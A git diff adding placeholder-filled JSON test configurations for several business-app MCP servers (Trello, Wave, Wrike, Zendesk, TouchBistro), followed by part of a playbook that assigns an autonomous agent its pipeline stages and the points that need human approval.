{ + "args": { + "page": 50, + "pageSize": 50, + "date": "test_value", + "status": "", + "partySize": 50 + }, + "expect": "exists" + }, + "create_reservation": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + 
"tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "content && content.length > 0" + }, + "create_reservation:empty-customerPhone": { + "args": { + "customerName": "Test Name", + "customerPhone": "", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-customerEmail": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-tableId": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "", + "notes": "test_value", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-notes": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "", + "source": "phone" + }, + "expect": "exists" + }, + "create_reservation:empty-source": { + "args": { + "customerName": "Test Name", + "customerPhone": "test_value", + "customerEmail": "test@example.com", + "partySize": 50, + "date": "test_value", + "time": "test_value", + "tableId": "test-id-123", + "notes": "test_value", + "source": "" + }, + "expect": "exists" + }, + "list_staff": { + "args": { + "page": 50, + "pageSize": 50, + "role": "server", + "active": true + }, + "expect": "content && content.length > 0" + }, + "list_staff:empty-role": { + "args": { + "page": 50, + "pageSize": 50, + "role": "", + "active": true + }, + "expect": "exists" + }, 
+ "get_sales_report": { + "args": { + "startDate": "test_value", + "endDate": "test_value", + "groupBy": "day", + "includeVoids": true, + "includeRefunds": true + }, + "expect": "content && content.length > 0" + }, + "get_sales_report:empty-groupBy": { + "args": { + "startDate": "test_value", + "endDate": "test_value", + "groupBy": "", + "includeVoids": true, + "includeRefunds": true + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/touchbistro.json b/factory-tools/test-configs/touchbistro.json new file mode 100644 index 0000000..036f1b0 --- /dev/null +++ b/factory-tools/test-configs/touchbistro.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/touchbistro/dist/index.js" + ], + "env": { + "TOUCHBISTRO_API_KEY": "factory_discovery_dummy", + "TOUCHBISTRO_VENUE_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/trello-tests.json b/factory-tools/test-configs/trello-tests.json new file mode 100644 index 0000000..d9f9bfd --- /dev/null +++ b/factory-tools/test-configs/trello-tests.json @@ -0,0 +1,346 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/trello/dist/index.js" + ], + "env": { + "TRELLO_API_KEY": "factory_discovery_dummy", + "TRELLO_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_boards": { + "args": { + "filter": "all", + "fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_boards:empty-filter": { + "args": { + "filter": "", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_boards:empty-fields": { + "args": { + "filter": "all", + "fields": "" + }, + "expect": "exists" + }, + "get_board": { + "args": { + "board_id": "test-id-123", + "lists": "all", + "cards": "all", 
+ "members": true + }, + "expect": "content && content.length > 0" + }, + "get_board:empty-lists": { + "args": { + "board_id": "test-id-123", + "lists": "", + "cards": "all", + "members": true + }, + "expect": "exists" + }, + "get_board:empty-cards": { + "args": { + "board_id": "test-id-123", + "lists": "all", + "cards": "", + "members": true + }, + "expect": "exists" + }, + "list_lists": { + "args": { + "board_id": "test-id-123", + "filter": "all", + "cards": "all" + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-filter": { + "args": { + "board_id": "test-id-123", + "filter": "", + "cards": "all" + }, + "expect": "exists" + }, + "list_lists:empty-cards": { + "args": { + "board_id": "test-id-123", + "filter": "all", + "cards": "" + }, + "expect": "exists" + }, + "list_cards": { + "args": { + "board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "all", + "fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_cards:empty-board_id": { + "args": { + "board_id": "", + "list_id": "test-id-123", + "filter": "all", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-list_id": { + "args": { + "board_id": "test-id-123", + "list_id": "", + "filter": "all", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-filter": { + "args": { + "board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-fields": { + "args": { + "board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "all", + "fields": "" + }, + "expect": "exists" + }, + "get_card": { + "args": { + "card_id": "test-id-123", + "members": true, + "checklists": "all", + "attachments": true + }, + "expect": "content && content.length > 0" + }, + "get_card:empty-checklists": { + "args": { + "card_id": "test-id-123", + "members": true, + "checklists": "", + "attachments": true + }, + "expect": "exists" + }, + 
"create_card": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "content && content.length > 0" + }, + "create_card:empty-desc": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-pos": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-due": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-urlSource": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "" + }, + "expect": "exists" + }, + "update_card": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_card:empty-name": { + "args": { + "card_id": "test-id-123", + "name": "", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-desc": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "", + 
"closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-due": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-pos": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "" + }, + "expect": "exists" + }, + "move_card": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "test-id-123", + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "move_card:empty-board_id": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "", + "pos": "test_value" + }, + "expect": "exists" + }, + "move_card:empty-pos": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "test-id-123", + "pos": "" + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "card_id": "test-id-123", + "text": "Sample content for testing" + }, + "expect": "content && content.length > 0" + }, + "create_list": { + "args": { + "board_id": "test-id-123", + "name": "Test Name", + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_list:empty-pos": { + "args": { + "board_id": "test-id-123", + "name": "Test Name", + "pos": "" + }, + "expect": "exists" + }, + "archive_card": { + "args": { + "card_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "delete_card": { + "args": { + "card_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/trello.json b/factory-tools/test-configs/trello.json new file mode 100644 index 0000000..8b5d9fb --- 
/dev/null +++ b/factory-tools/test-configs/trello.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/trello/dist/index.js" + ], + "env": { + "TRELLO_API_KEY": "factory_discovery_dummy", + "TRELLO_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wave-tests.json b/factory-tools/test-configs/wave-tests.json new file mode 100644 index 0000000..c718a3c --- /dev/null +++ b/factory-tools/test-configs/wave-tests.json @@ -0,0 +1,336 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wave/dist/index.js" + ], + "env": { + "WAVE_API_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_businesses": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_invoices": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_invoice": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "test_value", + "items": [], + "memo": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_invoice:empty-invoiceDate": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "", + "dueDate": "test_value", + "items": [], + "memo": "test_value" + }, + "expect": "exists" + }, + "create_invoice:empty-dueDate": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "", + "items": [], + "memo": "test_value" + }, + "expect": "exists" + }, + "create_invoice:empty-memo": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "test_value", + "items": [], + "memo": "" + }, + "expect": "exists" + }, + "list_customers": { + 
"args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_customer": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_customer:empty-email": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-firstName": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-lastName": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-phone": { + "args": { + "businessId": "test-id-123", + 
"name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-addressLine1": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-addressLine2": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-city": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-provinceCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": 
"test_value", + "provinceCode": "", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-postalCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-countryCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-currency": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "" + }, + "expect": "exists" + }, + "list_accounts": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "list_transactions": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_expense": { + "args": { + "businessId": "test-id-123", + "externalId": "test-id-123", + "date": "test_value", + "description": "test_value", + "anchor": {}, + "lineItems": [] + }, + "expect": 
"content && content.length > 0" + }, + "create_expense:empty-externalId": { + "args": { + "businessId": "test-id-123", + "externalId": "", + "date": "test_value", + "description": "test_value", + "anchor": {}, + "lineItems": [] + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wave.json b/factory-tools/test-configs/wave.json new file mode 100644 index 0000000..67667b9 --- /dev/null +++ b/factory-tools/test-configs/wave.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wave/dist/index.js" + ], + "env": { + "WAVE_API_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wrike-tests.json b/factory-tools/test-configs/wrike-tests.json new file mode 100644 index 0000000..7f54c3e --- /dev/null +++ b/factory-tools/test-configs/wrike-tests.json @@ -0,0 +1,251 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wrike/dist/index.js" + ], + "env": { + "WRIKE_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tasks": { + "args": { + "folder_id": "test-id-123", + "status": "Active", + "limit": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-folder_id": { + "args": { + "folder_id": "", + "status": "Active", + "limit": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-status": { + "args": { + "folder_id": "test-id-123", + "status": "", + "limit": 50 + }, + "expect": "exists" + }, + "get_task": { + "args": { + "task_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_task": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": 
"test_value", + "responsibles": [] + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-status": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-importance": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-start_date": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-due_date": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "", + "responsibles": [] + }, + "expect": "exists" + }, + "update_task": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "content && content.length > 0" + }, + "update_task:empty-title": { + "args": { + "task_id": "test-id-123", + "title": "", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": 
"test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-description": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-status": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-importance": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-start_date": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-due_date": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "list_folders": { + "args": { + "parent_folder_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_folders:empty-parent_folder_id": { + "args": { + "parent_folder_id": "" + }, + "expect": "exists" + }, + "list_projects": { + "args": {}, + "expect": "content && content.length > 0" 
+ }, + "add_comment": { + "args": { + "task_id": "test-id-123", + "text": "Sample content for testing" + }, + "expect": "content && content.length > 0" + }, + "list_users": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wrike.json b/factory-tools/test-configs/wrike.json new file mode 100644 index 0000000..1d308ab --- /dev/null +++ b/factory-tools/test-configs/wrike.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wrike/dist/index.js" + ], + "env": { + "WRIKE_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/zendesk-tests.json b/factory-tools/test-configs/zendesk-tests.json new file mode 100644 index 0000000..255bcdd --- /dev/null +++ b/factory-tools/test-configs/zendesk-tests.json @@ -0,0 +1,266 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/zendesk/dist/index.js" + ], + "env": { + "ZENDESK_API_TOKEN": "factory_discovery_dummy", + "ZENDESK_EMAIL": "factory_discovery_dummy", + "ZENDESK_SUBDOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tickets": { + "args": { + "status": "new", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tickets:empty-status": { + "args": { + "status": "", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_tickets:empty-sort_by": { + "args": { + "status": "new", + "sort_by": "", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_tickets:empty-sort_order": { + "args": { + "status": "new", + "sort_by": "test_value", + "sort_order": "", + 
"page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "get_ticket": { + "args": { + "ticket_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_ticket": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_ticket:empty-requester_email": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "", + "requester_name": "Test Name", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-requester_name": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-priority": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-type": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "urgent", + "type": "", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "update_ticket": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "content && content.length > 0" + }, + 
"update_ticket:empty-status": { + "args": { + "ticket_id": 50, + "status": "", + "priority": "urgent", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-priority": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-type": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-subject": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "problem", + "subject": "", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "ticket_id": 50, + "body": "test_value", + "public": true, + "author_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_users": { + "args": { + "role": "end-user", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_users:empty-role": { + "args": { + "role": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets": { + "args": { + "query": "test query", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "search_tickets:empty-sort_by": { + "args": { + "query": "test query", + "sort_by": "", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets:empty-sort_order": { + "args": { + "query": "test query", + "sort_by": 
"test_value", + "sort_order": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/zendesk.json b/factory-tools/test-configs/zendesk.json new file mode 100644 index 0000000..047618e --- /dev/null +++ b/factory-tools/test-configs/zendesk.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/zendesk/dist/index.js" + ], + "env": { + "ZENDESK_API_TOKEN": "factory_discovery_dummy", + "ZENDESK_EMAIL": "factory_discovery_dummy", + "ZENDESK_SUBDOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/manim-mcp b/manim-mcp new file mode 160000 index 0000000..983d5a0 --- /dev/null +++ b/manim-mcp @@ -0,0 +1 @@ +Subproject commit 983d5a0ef49de31147b29375909d7887854f65e0 diff --git a/mcp-command-center/PIPELINE-OPERATOR.md b/mcp-command-center/PIPELINE-OPERATOR.md new file mode 100644 index 0000000..90d31f1 --- /dev/null +++ b/mcp-command-center/PIPELINE-OPERATOR.md @@ -0,0 +1,118 @@ +# MCP Pipeline Operator — Buba's Playbook + +## Role +I (Buba) am the autonomous pipeline operator for all MCP server development. I read and write `state.json` as the source of truth, post to Discord channels for decisions and updates, and do the actual work of advancing MCPs through the 25-stage lifecycle. 
+ +## State File +- **Path:** `/Users/jakeshore/.clawdbot/workspace/mcp-command-center/state.json` +- **Dashboard:** `/Users/jakeshore/.clawdbot/workspace/mcp-command-center/index.html` +- Read state.json to know where every MCP is +- Write state.json after advancing any card +- The dashboard reads state.json for display + +## Discord Channel Map +| Channel | ID | Purpose | +|---------|-----|---------| +| #pipeline-decisions | 1468757982140567676 | Go/no-go, architecture, publishing approvals | +| #design-reviews | 1468757983428083762 | Mockup + screenshot approval (Stage 7) | +| #pipeline-standup | 1468757984384389234 | Daily standup post | +| #build-log | 1468757986422820864 | Every card movement, build result | +| #blockers | 1468757987412938945 | Stuck MCPs, escalations | +| #mcp-strategy | 1468757988448669829 | Strategy discussions | +| #shipped | 1468757989497507870 | Production launches, wins | + +## Autonomy Rules + +### Auto-Advance (no approval needed) +Stages: 1→2, 2→3, 3→4 (if research looks good), 5→6, 6→7, 8→9, 9→10, 10→11, 11→12, 12→13, 13→14 + +For each: do the work, update state.json, post to #build-log. 
+ +### Human-in-the-Loop (must get Jake's approval) +| Stage | Decision | Channel | Reaction Format | +|-------|----------|---------|----------------| +| 4 (Architecture) | Tool list + app plan approval | #pipeline-decisions | ✅ approve / ❌ rethink / 💬 discuss | +| 7a (Design Mockups) | Nano Banana Pro mockup approval | #design-reviews | ✅ build it / ✏️ changes / ❌ scrap | +| 7c (Final Screenshots) | Built app screenshot approval | #design-reviews | ✅ ship it / ✏️ tweaks / 🔄 rebuild | +| 15 (GitHub Publish) | Publishing approval | #pipeline-decisions | ✅ publish / ❌ hold | +| 16 (Registry Listed) | Registry listing approval | #pipeline-decisions | ✅ list it / ❌ hold | +| 22-24 (Monetization) | Pricing/enterprise decisions | #pipeline-decisions | ✅ / ❌ / 💬 | + +### Stage 7 Special Flow (Two-Gate Visual Approval) +``` +7a: Generate mockup with Nano Banana Pro → post to #design-reviews → wait for ✅ +7b: Build the app (autonomous after mockup approved) +7c: Screenshot real app → post to #design-reviews with mockup comparison → wait for ✅ +Only then advance to Stage 8 +``` + +### Blocker Protocol +1. Hit a problem → try to fix it (up to 2 attempts) +2. If still stuck → flag as blocked in state.json +3. Post to #blockers with details +4. 
